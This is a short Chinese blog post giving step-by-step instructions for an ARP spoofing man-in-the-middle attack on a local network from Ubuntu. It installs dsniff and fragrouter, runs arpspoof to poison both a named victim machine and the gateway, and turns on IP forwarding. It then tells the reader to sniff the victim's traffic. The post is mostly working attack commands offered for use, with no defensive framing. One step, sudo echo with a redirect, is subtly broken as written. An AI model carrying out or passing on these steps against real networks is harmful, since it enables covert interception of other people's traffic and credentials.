Ubuntu进行ARP欺骗


假设系统是ubuntu 9.10,网络情况:路由ip:172.16.86.254 我的电脑ip:172.16.86.2 受害者ip:172.16.86.3

主要用到的工具有2个,一个是Dsniff,还有一个是 fragrouter。

I. 安装Dsniff

    sudo apt-get install dsniff

II. 安装 fragrouter

在/etc/apt/sources.list 文件中添加源:

deb http://cz.archive.ubuntu.com/ubuntu hardy main universe

再执行

    sudo apt-get install fragrouter

III. ARP欺骗

欺骗172.16.86.3,告诉172.16.86.3,网关172.16.86.254的MAC地址是本机的MAC地址:

    sudo arpspoof -t 172.16.86.3 172.16.86.254 

欺骗网关,告诉网关,172.16.86.3的MAC地址是本机的MAC地址:

    sudo arpspoof -t 172.16.86.254 172.16.86.3 

ARP数据包广播之后,网关和受害机之间的数据交流就都需要经过我的机器了

设置转发,让受害机与网关的通信正常:

    $ sudo echo 1 >/proc/sys/net/ipv4/ip_forward
    $ fragrouter -B1

接下来就可以嗅探数据咯,还不会用Dsniff的TX去网上搜索一些资料看看,或者转用WireShark的GUI工具抓包……


「倘若有所帮助,不妨酌情赞赏!」

Holmesian

感谢您的支持!

使用微信扫描二维码完成支付


相关文章

发表新评论